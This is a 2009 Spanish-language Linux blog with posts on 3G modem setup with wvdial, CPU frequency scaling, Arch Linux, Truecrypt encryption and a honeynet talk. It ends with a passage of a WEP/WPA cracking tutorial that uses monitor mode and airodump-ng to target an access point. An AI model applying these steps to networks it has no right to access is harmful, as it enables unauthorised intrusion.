Demo Blog

Potterpig

POR FIN CON DOMINIO PROPIO

by Andrés Morantes on Nov.22, 2009, under

DESPUES DE UNA LARGA ESPERA Y ALGUNOS CONSEJOS Y FINALMENTE CON LA AYUDA DE @eepica HE DECIDIDO MONTAR DOMINIO, ESPERO LES GUSTE Y PEQUESE LA RODADITA
1 comentarios more...

Configuración de modem USB 3G y celular 3G como modem

by Andrés Morantes on Nov.22, 2009, under

Bueno, este tip me ha sacado de varios líos, da la casualidad que soy una persona que le gusta viajar mucho, por lo general llevo conmigo mi fiel amigo netbook y mi celular 3G que por suerte no es Blackbery y lo esto porque la mayoría de estos dispositivos son GSM en Colombia, y la gente es muy ingenua y aun así los compran, en fin, he necesitado conectarme desde mi linux, lo cual mostrare varios ejemplos.
Dispositivos usados
LG GM310
HUAWEI 156B

La forma fácil.

Esta es de muy ayuda si no se tiene mucho conocimiento o si realmente se esta de afan, y es el Network Manager, este es el famoso software de administración de redes que viene por defecto en Gnome, lo cual puede convivir con otros escritorios como xfce4 y openbox, este sera de gran ayuda para los que usan Ubuntu, ya que viene por defecto.


















































La forma ideal.

Para mi Network manager es un administrador que realmente ODIO con todo mi ser, como alguien dijo alguna vez este es posiblemente un demonio mutante, así pues, prefiero soluciones alternativas.
Por lo general estos modems se detecta como /dev/ttyUSB0 o /dev/ttyUSB1 y los celulares 3G conectados como modem se detectan como /dev/ttyACM0 o /dev/ttyACM1

para esto basta con hacer un ls sobre /dev de la siguiente forma


[spiderpig@blacky ~]$ ls /dev/tty
tty      tty16    tty24    tty32    tty40    tty49    tty57    tty8
tty0     tty17    tty25    tty33    tty41    tty5     tty58    tty9
tty1     tty18    tty26    tty34    tty42    tty50    tty59    ttyS0
tty10    tty19    tty27    tty35    tty43    tty51    tty6     ttyS1
tty11    tty2     tty28    tty36    tty44    tty52    tty60    ttyS2
tty12    tty20    tty29    tty37    tty45    tty53    tty61    ttyS3
tty13    tty21    tty3     tty38    tty46    tty54    tty62    ttyUSB0
tty14    tty22    tty30    tty39    tty47    tty55    tty63    ttyUSB1
tty15    tty23    tty31    tty4     tty48    tty56    tty7

ahora descargaremos los paquetes necesarios, en este caso serian wvdial y ppp y posterior a esto modificaremos el archivo de configuración, con este archivo de configuración podremos tener acceso a cualquier operador móvil en Colombia, la idea es modificar el archivo de configuracion segun sea el dispositivo a usar, si es un modem 3G usar /dev/ttyUSB0 o un Celular como modem 3G usar /dev/ttyACM0, en mi caso como hago uso de los dos solo comentare el que no uso agregando (;).

[spiderpig@blacky ~]$ sudo pacman -Sy wvdial ppp
[spiderpig@blacky ~]$ nano /etc/wvdial.conf



[Dialer tigo]
init1=AT+CGDCONT=1,"IP","web.colombiamovil.com.co"
Modem Type = USB Modem
ISDN = 0
Password = "guess"
Username = "guess"
New PPPD = yes
Phone = * 99#
Modem = /dev/ttyUSB0
;Modem = /dev/ttyACM0
Baud = 460800
Stupid Mode = yes

[Dialer comcel]
init1=AT+CGDCONT=1,"IP","internet.comcel.com.co"
Modem Type = USB Modem
ISDN = 0
Password = "COMCELWEB"
Username = "COMCELWEB"
New PPPD = yes
Phone = * 99#
Modem = /dev/ttyUSB0
;Modem = /dev/ttyACM0
Baud = 460800Stupid Mode = yes


[Dialer movistar]
init1=AT+CGDCONT=1,"IP","internet.movistar.com.co"
Modem Type = USB Modem
ISDN = 0
Password = "movistar"
Username = "movistar"
New PPPD = yes
Phone = * 99#
Modem = /dev/ttyUSB0
;Modem = /dev/ttyACM0

Baud = 460800
Stupid Mode = yes

ahora solo basta con conectarnos con el operador de la siguiente forma.

wvdial [operador], como mi operador es tigo seria de la siguiente forma

[spiderpig@blacky ~]$ sudo wvdial tigo

Nota: en mi caso, tuve problemas en Arch para conectarme al principio el cual viendo los logs del sistema fue facil detectar la raiz del problema


Oct 28 12:48:05 blacky kernel: usb 1-2: new high speed USB device using ehci_hcd and address 20
Oct 28 12:48:05 blacky kernel: scsi27 : usb-storage 1-2:1.0
Oct 28 12:48:05 blacky kernel: usb 1-2: USB disconnect, address 20
Oct 28 12:48:12 blacky kernel: usb 1-2: new high speed USB device using ehci_hcd and address 21
Oct 28 12:48:12 blacky kernel: option 1-2:1.0: GSM modem (1-port) converter detected
Oct 28 12:48:12 blacky kernel: usb 1-2: GSM modem (1-port) converter now attached to ttyUSB0
Oct 28 12:48:12 blacky kernel: option 1-2:1.1: GSM modem (1-port) converter detected
Oct 28 12:48:12 blacky kernel: usb 1-2: GSM modem (1-port) converter now attached to ttyUSB1
Oct 28 12:48:12 blacky kernel: scsi28 : usb-storage 1-2:1.2
Oct 28 12:48:12 blacky kernel: scsi29 : usb-storage 1-2:1.3
Oct 28 12:48:13 blacky kernel: scsi 28:0:0:0: CD-ROM            HUAWEI   Mass Storage     2.31 PQ: 0 ANSI: 2
Oct 28 12:48:13 blacky kernel: scsi 29:0:0:0: Direct-Access     HUAWEI   MMC Storage      2.31 PQ: 0 ANSI: 2
Oct 28 12:48:13 blacky kernel: sd 29:0:0:0: Attached scsi generic sg2 type 0
Oct 28 12:48:13 blacky kernel: sr0: scsi-1 drive
Oct 28 12:48:13 blacky kernel: sd 29:0:0:0: [sdc] Attached SCSI removable disk
Oct 28 12:48:13 blacky kernel: sr 28:0:0:0: Attached scsi generic sg3 type 5
Oct 28 12:48:15 blacky kernel: sd 29:0:0:0: [sdc] 121856 512-byte logical blocks: (62.3 MB/59.5 MiB)
Oct 28 12:48:15 blacky kernel: sdc: sdc1



como ven, al conectar mi modem, el se detecta como una unidad externa de CDROM, este error es comun y una buena forma de corregir esto es cambiando la politica para se detectado como modem y no como dispositivo externo.

Otro error comun es el siguiente


[spiderpig@blacky ~]$ sudo wvdial tigo
--> WvDial: Internet dialer version 1.61
--> Cannot get information for serial port.
--> Initializing modem.
--> Sending: AT+CGDCONT=1,"IP","web.colombiamovil.com.co"
--> Sending: ATQ0
ATQ0
OK
--> Re-Sending: AT+CGDCONT=1,"IP","web.colombiamovil.com.co"
AT+CGDCONT=1,"IP","web.colombiamovil.com.co"
OK
--> Modem initialized.
--> Sending: ATDT* 99#
--> Waiting for carrier.
ATDT* 99#
NO CARRIER
--> No Carrier!  Trying again.
--> Sending: ATDT* 99#
--> Waiting for carrier.
ATDT* 99#
NO CARRIER
--> No Carrier!  Trying again.
--> Sending: ATDT* 99#
--> Waiting for carrier.
ATDT* 99#

Este error se debe a dos cosas, posiblemente estas ejecutando el wvdial antes de que el dispositivo móvil detecte estaciones bases cercanas, o posiblemente este dispositivo se detecto y subió como un dispositivo externo. La solución es sencilla, desconecte el módem y vuelva a conectarlo, espere a que este se sincronice, por lo general puede durar hasta 30 seg sincronizando y vuelva a intentar.
Saldrá algo parecido a esto
[spiderpig@blacky ~]$ sudo wvdial tigo
--> WvDial: Internet dialer version 1.61
--> Cannot get information for serial port.
--> Initializing modem.
--> Sending: AT+CGDCONT=1,"IP","web.colombiamovil.com.co"
AT+CGDCONT=1,"IP","web.colombiamovil.com.co"
OK
--> Modem initialized.
--> Sending: ATDT* 99#
--> Waiting for carrier.
ATDT* 99#
CONNECT
--> Carrier detected.  Starting PPP immediately.
--> Starting pppd at Thu Oct 28 12:58:16 2010
--> Pid of pppd: 15937
--> Using interface ppp0
--> pppd: �11]� 
--> pppd: �11]� 
--> pppd: �11]� 
--> pppd: �11]� 
--> pppd: �11]� 
--> pppd: �11]� 
--> local  IP address 186.180.72.84
--> pppd: �11]� 
--> remote IP address 10.64.64.64
--> pppd: �11]� 
--> primary   DNS address 200.13.249.101
--> pppd: �11]� 
--> secondary DNS address 200.75.51.133
--> pppd: �11]�

0 comentarios more...

Distros basadas en Arch Linux

by Andrés Morantes on Nov.22, 2009, under

Bueno después de algún tiempo de jugar con Arch Linux, he decidido difundir esta buena distro a muchos amigos y personas cercanas a mi como lo demuestra en su entrada mi linda y favorita debianita @eepica, pero mi alegría es saber que hay mas opciones para donde probar, hay colores y sabores, la cerveza tiene muchas marcas y sabores y esto es lo que me encantan de estas distribuciones.

Bueno pues en estos días me puse a la tarea de investigar distros basadas en Arch, y pues como uds saben encontré varias en el oraculo, como


Chakra
KahelOS 
Linux-gamers

pero una mas que todas me causo curiosidad, tenia mas cosas que me llamaron la atención, esta es Archbang. Me ha gustado mas su escritorio, es liviano y sencillo, esto gracias a openbox windows manager, viene con conky configurado para abrir algunos programas mas rápido, en fin... muy bueno, ademas viene con las herramientas que normalmene uso ... sin ser exagerados ... como Ubuntu, por ejemplo dropbox, gftp, chromium, pidgin, gimp, mplayer, xfburn

Bueno ... dejo algunos pantallazos para que se antojen.

es interesante ver el conky ya configurado y con su lista de comandos rápidos al lado derecho, los iconos al lado derecho también vienen configurados, el primero es el xfce4-power-manager el cual ayuda a configurar las opciones de uso de baterías, especial para portátiles, el siguiente es el wicd sirve para manejar las interfaces de rd en mi caso me detecto mi wireless y ya estaba lista para usar, el siguiente es un gestor de porta papeles.



su terminal, es colorida pero organizada.
0 comentarios more...

Configuración de la frecuencia del procesador para laptops, netbooks

by Andrés Morantes on Nov.22, 2009, under

Vi la necesidad de crear esta entrada debido a la cantidad de preguntas que me han hecho al respecto. Es un tema que pensé que muchos sabían, pero al socializar con varios linuxcero me di cuenta de lo contrario.
Es en cuanto al uso de la frecuencia del procesador, se que muchos que han usado Linux han notado que sus laptops o netbooks tienden a calentarse un poco mas de lo general, pues bueno, esto tiene su razón. El problema es que la mayoría de distros vienen pre configuradas para desktops y servidores, por lo tanto, al hacer uso de estas distros en un laptop, este hará uso del 100% de su procesador, pero notemos que esto no es muy recomendable, ya que por lo general la temperatura de tu procesador también sube, cuando se tiene un laptop nuevo, no notaras el cambio, después de un tiempo largo (mas de un anio) notaras estas altas temperaturas. Lo ideal es que tu procesador oscile según la demanda del usuario, si el usuario necesita altos procesamientos la frecuencia por ejemplo videos, peliculas, compilaciones entre otras debera subir al tope del procesador, pero si lo que necesitas es trabajar en ofimatica, messenger y navegacion, pues esta frecuencia deberia bajar, si te pones a pensar la mayoria de tiempo bno estas viendo videos ni haciendo uso del 100% del procesador lo cual seria bueno bajar estas frecuencias. Por lo general estos procesadores están dise;ados para subir y bajar la frecuencia en ciertos topes, lo cual son configurados por el fabricante, a esto se denomina CPU frequency scaling.
Ok, para esto hay trucos buenos muchos de ellos, primero que todo volveré a decir que tomare en cuenta que es una distro tipo ArchLinux, también tomare como ejemplo un netbook que usa procesador Intel Atom de 1.66 Ghz, este procesador tiene 3 escalas de frecuencia, 800Mhz,1000Mhz y 1.66Ghz.
Observar la frecuencia del procesador con el siguiente comando
Este netbook, detecta dos procesadores, uno real y uno simulado, la siguiente característica debe tener debe tener la mayoría de procesadores nuevos que cuenta con mas de 1 procesador, y es que los dos procesadores tienen que oscilar.

Si esta frecuencia se encuentra en el tope mas alto no estas usando recursos de maquina y no se mueve, necesita configurar este escalado de frecuencia.

[spiderpig@blacky ~]$ watch grep \"cpu MHz\" /proc/cpuinfo


Every 2,0s: grep "cpu MHz" /proc/cpuinfo Tue Jun 3 00:05:19 2008

cpu MHz : 1600.000
cpu MHz : 1600.000



-Bueno, en realidad hay varias herramientas que te pueden ayudar a un buen manejo de frecuencia el siguiente link te guiara mejor
http://wiki.archlinux.org/index.php/Cpufreq


yo opto por una forma sencilla y me ha dado buenos resultados, y es la combinacion de powernowd y laptop-mode. powernowd es una herramienta que hace que el procesador oscile bastante entre los tres posibles saltos que mi procesador puede dar, pero el problema es ese, que oscila demasiado, y laptop-mode es una herramienta que ayuda a que el procesador entre en un modo conservative, este modo ayuda a que el procesador mantenga la frecuencia mas estable al necesitarla, me explico, si el procesador hace una peticion de alto rendimiento y despues deja de hacer uso, estee mantiene un poco la frecuencia hasta que se vea que realmente no es necesaria.
Mi metodo es combinar las dos herramientas, ya que prefiero que el procesador no oscile tanto y haga el escalado d frecuencia mas rapido y eficiente.

se instalara el demonio powernow.

[spiderpig@blacky ~]$sudo yaourt -S powernowd

posterior a eso se agrega la linea
OPTIONS="-q -u 15 -l 5"


[spiderpig@blacky ~]$ sudo nano /etc/conf.d/powernowd

# Configuration file for powernowd

# If no options given, powernowd should be able to autodetect
# a sane setup. So most users will not have to put anything
# here.

OPTIONS="-q -u 15 -l 5"

------------------------------
$ powernowd -h
PowerNow Daemon v1.00, (c) 2003-2008 John Clemens
Daemon to control the speed and voltage of cpus.

This is a simple client to the CPUFreq driver, and uses
linux kernel v2.5+ sysfs interface. You need a supported
cpu, and a kernel that supports sysfs to run this daemon.

Available Options:
-h Print this help message
-d Don't detach from terminal (default is to
detach and run in the background)
-v Increase output verbosity, can be used more than once.
-q Quiet mode, only emergency output.
-n Include 'nice'd processes in calculations
-m # Modes of operation, can be 0, 1, 2, or 3:
0 = SINE, 1 = AGGRESSIVE (default),
2 = PASSIVE, 3 = LEAPS
-s # Frequency step in kHz (default = 100000)
-p # Polling frequency in msecs (default = 1000)
-c # Specify number of threads per power-managed core
-u # CPU usage upper limit percentage [0 .. 100, default 80]
-l # CPU usage lower limit percentage [0 .. 100, default 20]
---------------------------------
iniciar el demonio

[spiderpig@blacky ~]$ sudo /etc/rc.d/powernowd start


:: Starting Powernowd [DONE]

[spiderpig@blacky ~]$ sudo pacman -S laptop-mode-tools
[spiderpig@blacky ~]$ sudo /etc/rc.d/laptop-mode start
:: Starting laptop-mode [DONE]

por ultimo se configura los demonios para que carguen al inicio para esto se editara el archivo rc.conf y se agrega los demonios powernow y laptop-mode


[spiderpig@blacky ~]$ sudo nano /etc/rc.conf

DAEMONS=(dbus hal syslog-ng !network !dhcdbd !networkmanager powernowd @wicd @alsa laptop-mode)

por ultimo podemos ver en una consola, como oscilan los procesadores, estos deben subir en un momento de alto rendimiento y bajar inmediatamente al no necesitarlo, una prueba fácil, es cuando se abre un navegador y ves un vídeo de youtube y cierras el navegador, la frecuencia sube al max. y cae a pique, constantemente en los dos procesadores.
Por ultimo hay distros que realizan esta tarea, incluso encontraras distros para netbooks y laptops, que ya poseen estas configuraciones, incluso la mayoría de estas son basadas en Ubuntu, lo que ahorraría tiempo de instalación, pero si notan el escalado con el que vienen configurado tendrás otra opinión, y es que ubuntu ha hecho que su escritorio sea mas amigable para el usuario agregando temas y paquetes que realmente NO SON NECESARIOS y eso hace que se consuman muchos recursos del sistema. 


Para completar tambien es recomendable la herramienta powertop, esta herramienta chequea y verifica servicios que hace que consuman mucha batería y las podrá desactivar con solo un ENTER.


[spiderpig@blacky ~]$ sudo pacman -S powertop




En mi próxima entrada hablare de una distro, amigable, eficiente, flexible y segura para el usuario.
0 comentarios more...

Arch Linux, una distro que me ha dejado sin palabras

by Andrés Morantes on Nov.22, 2009, under

Bueno esta entrada, en realidad la tenia que hacer, porque? bueno soy fanático a Debian y además a Linux como sistema operativo.

Muchos se han queda sorprendidos por mi brusco cambio, y aun no creen esta locura... pero usted, Arch Linux? como? me han dicho...
y es que no es por más, ha sido una distribución que ya había probado hace mucho y venia dándole algunas ojeadas, e incluso la alcance a virtualizar, pero no aguantaba las ganas de instalarla totalmente en mi Portátil.

Ok, primero las razones "Sin instalar la distribución"

1)Siempre he estado en pro del rendimiento, flexibilidad y fácil manejo y no es por ser perezoso, es solo que en muchas ocasiones se necesita instalar paquetes muy rápido, debido a que no hay tiempo de compilar, es por eso que Debian me gustaba mucho, pero Arch Linux según lo que leía en sus manuales de instalación los paquetes a instalar son poco. Por otro lado es una distribución optimizada para i686 y x86_64 , salio de una LFS(Linux From Scratch), tiene mejor documentación para compilar un kernel personalizado y optimizado, eso sin decir que es una distro basada en BSD y funciona con scripts!! pero son muy fáciles de usar.

2)Esta es muy importante, y como dice cartman "me rompe las pelotas" y es la documentación, siempre he sido una persona muy conservadora, prefiero antes de instalar algo, leer e informarme antes de lanzarme, lo interesante es que al realizar una búsqueda en Google sobre Arch Linux, este te arroja a la Wiki de Arch Linux, lo que en realidad me impacta. Esta documentación es muy ordenada y objetiva, lo mejor de todo, es que sirve para cualquier versión de Arch Linux, en Debian tienes más información, pero esta regada por muchos foros, además de esto se tiene documentación por versión, en muchas ocasiones los archivos de configuración no son los mismos de una versión a otra, lo que me lleva a mi tercera razón.

3) Dado el caso que quisiera actualizar a la ultima versión no habrá problema con mi distribución, ya que lo que actualizo son los paquetes mas no la distro completa, como solía pasar en Debian, no esta de acuerdo conmigo? los reto a que cambien sus repositorios por "sid" y hagan un apt-get dist-upgrade.

4) Esta es la mas sencilla, por que me gusta probar otras cosas, en la variedad esta el placer (no aplica en novias :P )


Pero de donde salio Arch Linux, es más que es Arch Linux?

Ok, dejara un texto sacado de la misma página de Arch Linux, espero sea de agrado esta historia.

Acerca de Arch Linux
Arch Linux es una distribución Linux® de uso general que puede ser adaptada a prácticamente cualquier uso. Es rápida, liviana, flexible, y la mayor parte del sistema es muy simple de comprender y modificar. Fue creada por Judd Vinet en el 2002, es de origen Canadiense y posee algunas características únicas (o no muy comunes) que detallamos a continuación.
Arch Linux esta optimizada actualmente para dos arquitecturas: i686 y x86_64. La versión i686 permite tener un mejor rendimiento que en el común de las distribuciones, donde los paquetes están compilados para i386. Mientras que la versión x86_64 (también conocida como amd64) nos permite utilizar nuestro sistema con todas las mejoras que trae la arquitectura de 64-bit y sus optimizaciones (instrucciones SSE, bit NX y otras).
Arch Linux utiliza Pacman como administrador de paquetes (package manager), el cual permite el uso de paquetes binarios (con resolución de dependencias y todas esas características que uno espera hoy día). Otra herramienta propia del sistema es "makepkg" quien permite la creación de simples scripts (llamados PKBUILDs) para compilar y preparar el paquete. Estas herramientas simplifican mucho el mantener nuestro propio repositorio o contribuir con Arch en el apartado de paquetes.
Pacman mantiene el sistema actualizado sincronizando su lista de paquetes con el servidor central (o un mirror), haciendo que la actualización del sistema sea muy sencilla y rápida, evitando problemas a los administradores. El sistema es muy similar al apt-get de Debian, o al yum de RedHat con un toque de sabor propio.
La lista de paquetes es amplia, esta dividida en 4 categorias: Core, Extra, Testing, Community.
Los paquetes que se encuentran en Core son los principales y el nucleo de la distribución. Están seguidos de los paquetes en Extra, que es donde se encuentran todos los paquetes útiles, tales como escritorios, herramientas de desarrollo y otros. Luego esta Testing que es donde se agregan los paquetes mas conflictivos u otros que requieren un periodo de prueba antes de ser pasados a los repositorios generales. Y por ultimo Community que es donde van a parar los paquetes que fueron creados por usuarios del AUR (Arch Users Repository) y que tuvieron una muy buena recepción por parte de los usuarios, lo que llevo a que fueran adoptados por un mantenedor oficial.
Arch Linux utiliza un sistema comúnmente conocido como "rolling release" que funciona de la siguiente manera: Los repositorios de la distribución tienen constantemente las ultimas versiones del software disponibles. Cada vez que corremos una actualización o instalamos un paquete, estamos instalando la ultima versi&oacuten disponible de este. Las aplicaciones son actualizadas por los desarrolladores/mantenedores de paquetes a medida que se anuncian las versiones estables de estas. Así es como hoy nos encontramos con la ultima versión de KDE o de Gnome en los repositorios estables.
Arch Linux no provee soporte oficial en Español, pero podes encontrar mucha gente que te puede ayudar en el canal de IRC y en los foros. También podes encontrar documentación en la Wiki.
En definitiva; Arch es una distribución simple y liviana, que mantiene una filosofía KISS que le funciona a mucha gente y estas invitado a conocerla ;)
0 comentarios more...

Cifrado de Datos y Dispositivos en Debian

by Andrés Morantes on Nov.22, 2009, under

Actualmente, hemos visto lo fácil que es perder nuestra información si no se tiene una buena practica o si no se toman las medidas adecuadas para proteger nuestra información. Muchos dispositivos son tan pequeños que en la mayoría de las veces son hurtados con facilidad o extraviados, pero el problema no esta en la perdida del dispositivo, si no, en la perdida de la información sensible y en muchas ocaciones de gran valor, como fotos privadas o información de sus empresas. Es por esto que he creado esta entrada, para realizar una buena practica, en el almacenamiento de información sensible, para esto se hará uso del cifrado de dispositivos, el cual ayudará a que su dispositivo solo usado por el dueño y se requiera de una contraseña o password para poder acceder a ella, si esta clave no es correcta estos archivos no serán legibles.
Para esto mi recomendado es Truecrypt, ésta es una herramienta de cifrado de discos Open Source que se puede usar en múltiples plataformas(Windows, Linux, Mac).
Ok, ahora tratare en lo posible realizar mis artículos con alguna configuración de Arch Linux y de Debian, esto debido a que ahora he migrado a Arch Linux, pero no significa que haya dejado de ser Fan de la espiral roja :)

DEBIAN
Primero debemos ajustar nuestro paquetes, necesarios para la compilación

#apt-get install dmsetup libwxgtk2.8-dev libwxbase2.8-dev libfuse-dev libopencryptoki-dev g++ make gcc gcc-multilib manpages-dev gdb wx2.8-headers libopencryptoki0 fuse-utils libfuse2 ntfs-3g libwxgtk2.8-0

ahora debemos ir a la página de truecrypt escoger Mac OSX/Linux (.tar.gz)
leer el contrato y si estan de acuerdo, aceptar los términos de uso ;)

por último como un usuario debemos ejecutar:
$make
luego como super usuario:
#make install


Arch Linux


# pacman -S truecrypt

Nota: si usted está usando un disco cifrado totalmente y necesita ejecutar Truecrypt al iniciar el sistema tendrá que hacer lo siguiente:

editar el archivo rc.conf
# nano /etc/rc.conf

y agregar la palabra truecryp entre los parentesis qude MODULES
en mi caso seria:
MODULES=(acpi_cpufreq cpufreq_ondemand cpufreq_powersave truecrypt)

ahora solo queda en ejecutar en una terminal(shell) truecrypt
#truecrypt

De acá en adelante es trabajo de ustedes, truecrypt es muy sencillo de usar, puede crear archivos o particiones cifradas, la diferencia es que los archivos cifrados se comportan como una imagen que tienes que montar en una particion que deberas seleccionar en Truecypt, ese es el significado de la lista de números que salen y la creación de particiones depende del disco que desee usar, puede usar su disco entero para cifrarlo o un dispositivo USB. Estas opciones las podrá encontrar en Create Volume, el resto es carpinteria, le preguntá donde desea dejar el archivo y cifrado a usar, despues de esto se debera seleccionar uno de los números listados y darle "select device" y luego "Mount"

y Listo!!
Nota: hay plugins para cambiar a Truecrypt de idioma, lo que no les aconsejo que los instale, debido a que aun no esta muy estable y arrojara algunos errores extraños, es mejor dejarlo así en ingles.

o en mi caso que uso Arch Linux con Xfce4, ir a sistemas--> truecrypt
o ejecutar truecrypt en una terminal, da igual!!




0 comentarios more...

Honerynet para dar a luz perfiles de atacantes.

by Andrés Morantes on Nov.22, 2009, under

Ok, bueno muchoos me han preguntado por esta presentación y slides de la ponencia que realizamos en campus party, agradezco el interes y comentarios que me han hecho.Tambien pueden visitar el blog de @eepica el cual contiene estos slides y otra info muy interesante.

0 comentarios more...

Campus Party, Here we Goooo!!

by Andrés Morantes on Nov.22, 2009, under

Campus party se acerca, y la presión aumenta.


Sé que muchos me han preguntado por lo mismo, y definitivamente acá es donde mostraré lo poco que he aprendido del tema, se acerca este gran evento y ya se está preparando todos los detalles, siempre quise demostrar algo mas practico que teórico, debido a que en la mayoría de conferencias el público se mantiene sentados 2 horas con una persona que solo parlotea pero no permite a su publico probar, tocar y ver.


La conferencia trata sobre Honeynets, son aquellas redes trampas que pueden rastrear eventos de personas mal intencionadas que desean entrar a un sistema computacional, con el fin de aprender técnicas de ataques y su lógica para atacar. Así pues lo que se mostrará es como montar una honeynet, con algunas aplicaciones propias que serán atacadas. También se mostrara la captura de tráfico el cual mostrará el ataque realizado. Es un tema muy interesante. Espero les guste!!


 Mas detalles_______

                                    |
                                   V
 



Creación de Honeynet para dar a luz perfiles de atacantes.


“El atacante no es tu enemigo, es una persona razonable que nos enseña una lección valiosa.”por Andrés Morantes.




Objetivos

- Dar a conocer la definición de un Honeypot y una Honeynet.
- Mostrar las diferentes opciones para la creación de una Honeynet haciendo uso de herramientas Open Source (Windows y Linux)
- Realizar demotración de ataques a servicios más comunes capturando el tráfico de red

- Analizar una captura de tráfico de red para identificar un ataque

La idea de esta conferencia es demostrar las distintas formas de diseñar una Honeynet (virtuales o de alta interacción) mostrando a la audiencia las soluciones que ofrecen la imeplementación de éstas.

Es importante destacar que, debido a la cantidad de información que se tiene en la Web sobre montajes de honeypots, es complicado diferenciar éstas de un IDS. También es importante destacar que muchas organizaciones implementan IDS e IPS, gastando altos recursos en capacitación de personal para el manejo y protección de su red. Por lo cual la importancia de la implementación de honeypots de producción o/e investigación en organizaciones e instituciones educativas ayudarían a personas interesadas en administración de redes puedan pensar en nuevas soluciones para minimizar riesgos de ataques y a su vez generen conocimiento para mantener una red mas segura.

Por otra parte se intentará cambiar la imagen de la dificultad del montaje y uso de honeypots, debido a que muchos temen a no optar por esta clases de soluciones por desconocimiento del tema. Esto se realizará mediante el uso de herramientas Open Source, creando ataques y analizando sus trazas. También se realizará una captura de tráfico que nos demuestre la mejor solución para la identicación de ataques, esto basandonos en el diseño de Honeynet de Generación III.


Finalmente se realizará un montaje de una honeypot con algún servicio comprometido, tomando capturas que evidencien un ataque mediante el uso de herramientas Open Source.
0 comentarios more...

Wireless Hacking Wep - Wpa

by Andrés Morantes on Nov.22, 2009, under

Se que este ataque es algo viejo, pero lo posteo debido a que muchas veces me han preguntado sobre este tema y siempre les paso un manual que hice algun tiempo, asi pues, pienso que es mejor que quede en mi blog.

Bueno lo primero que tienen que hacer repito, es instalar Linux, estos ataques siempre son mas efectivos en las plataformas *NIX gracias a que los drivers ya hacen parte del kernel (en la mayoría de las ocasiones), además que les recomiendo Linux porque ya trae una cantidad de herramientas listicas para que uno las pruebe.

Otra cosa es saber escoger una buena wireless, yo personalmente les recomiendo las Ralink viejitas, ya que tienen mejor soporte en Linux. Otra un poco mas carita pero que en realidad es la mejor de todas son las Atheros, se van acordar de mi … ya que estas las usan muchos auditores de seguridad, incluso pueden buscar las D-link que ya vienen con este chipset, las D-link viejitas también son buenas, estas traen chipset Ralink. Por otro lado están las wireless de Windows la verdad algunas son buenas otras no mucho aunque hoy en día si corren con suerte Linux ya tendrá soporte, estas son las famosas Broadcom y algunas Intel que son las que vienen con los portatiles de HP y Compaq … así que prueben primero de la siguiente forma:

spiderpig:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

eth1      no wireless extensions.

wlan0     RT73 WLAN  ESSID:"SPIDERPIG"
          Mode:Managed  Frequency=2.437 GHz  Access Point: 00:1B:11:D4:54:63
          Bit Rate=54 Mb/s
          RTS thr:off   Fragment thr:off
          Encryption key: xxxxxxxxx
          Link Quality=91/100  Signal level:-34 dBm  Noise level:-79 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0


Fíjense que mi PC tiene 3 interfaces, la eth0 la eth1 y la wlan0. Mi tarjeta wireless en este caso seria la wlan0 que tiene chipset RT73, no siempre tendrá el mismo nombre de las interfaces por eso es que deben empezar por acá, asegúrense primero el nombre sus interfaces, de acá en adelante mi tarjeta wireless será wlan0. Si aparece después de este comando  significa que Linux la detecto, ahora la otra prueba de oro es saber si puedo pasarla a modo Monitor, recuerden que este modo es como el modo promiscuo solo que la wireless detecta las redes que tiene a su alcance. Para saber si esta en modo monitor se ejecuta el siguiente comando:

spiderpig:~# iwconfig wlan0 mode monitor

Ahora se probara que este en modo monitor, para esto ejecutamos de nuevo iwconfig:

spiderpig:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

eth1      no wireless extensions.

wlan0     RT73 WLAN  ESSID:""
          Mode:Monitor  Frequency=2.437 GHz  Bit Rate=48 Mb/s
          RTS thr:off   Fragment thr:off
          Encryption key:off
          Link Quality=89/100  Signal level:-32 dBm  Noise level:-115 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0


nota> si arroja algún error al pasarlo a modo monitor, se deberán bajar los driver directamente desde la pagina de aircrack y compilarlo.


Fíjense que ya cambio el modo, esto da luz verde a empezar a hacer el ataque.

Ahora se ejecutará el sniffing para detectar redes cercanas y usuarios asociados (“usuarios que estén conectados a algún Access Point”).

spiderpig:~# airodump-ng wlan0

Al lanzar este comando verán algo parecido a esto, podrán ver que en la parte izquierda donde dice CH empezara variar, eso significa que la wireless esta cambiando los canales para detectar redes. Esto mas que todo detecta redes de mayor potencia, se podría poner a escuchar redes en un solo canal, así que no es nada raro que encuentren mas redes al ponerlo a escuchar en un solo canal.

CH  5 ][ Elapsed: 56 s ][ 2008-06-08 14:02

BSSID                                   PWR  Beacons    #Data, #/s    CH  MB  ENC  CIPHER AUTH ESSID

00:0F:3D:FA:20:EE  100        2                0      0                 1   11  OPN              Telebucaramanga
00:0F:3D:FA:59:7F  104        18               0       0                 1     11   OPN              Telebucaramanga
00:16:B6:31:04:B9  100         4                 0       0                 6     48. WPA  TKIP   PSK  eparrar
00:1B:11:09:7F:30  100         10               0                     6    54.  WEP  WEP         TGI-03
00:17:3F:F2:59:A4   98          3                 0                     11   48   OPN              belkin54g
00:1B:11:D4:54:63   82         15                86                  6   54   WEP  WEP   SPIDERPIG
00:00:00:00:00:00   -1            0                 28                  8   -1   OPN             

BSSID                                 STATION          PWR   Rate  Lost  Packets  Probes

00:1B:11:D4:54:63        00:0E:35:8C:1C:1D   83  54- 0     0        5
00:00:00:00:00:00         00:02:2D:28:71:FB  101   0-11     0       28
(not associated)          00:1D:D9:2C:EF:DF  104   0- 1     0        5UNEIntercable,YOYI,Telebucaramanga

El atacante ve que SPIDERPIG tiene encriptación WEP y que además esta enviando datos y actualmente esta en el canal 6. Así que se pone el airodump a escuchar nada más a ese Access Point de la siguiente forma:

spiderpig:~# airodump-ng -c6 --bssid 00:1B:11:D4:54:63 -w spider wlan0
-w spider significa que va a crear un archivo que se llama spider, esto servirá después para poder descifrar la llave. Por lo general el crea 2 archivos uno spider-01.txt y un spider-01.cap. El txt se crea por comodidad, para poder ver las tramas creadas en un archivos de texto incluso para poder crear tramas ARP falsas cuando no tengamos usuarios asociados, los ataques son mas efectivos con alguien asociado pero podemos entrar al access point a las malas como quien dice y obligar al access point a que de información de los IVS que son las cabeceras de las tramas, ahí es donde se encuentra las llaves de acceso, el .cap son los tipos de archivos que se crean como captura de trafico, algo parecido a los archivos que crea el wireshark.


CH  6 ][ Elapsed: 40 s ][ 2008-06-08 19:46

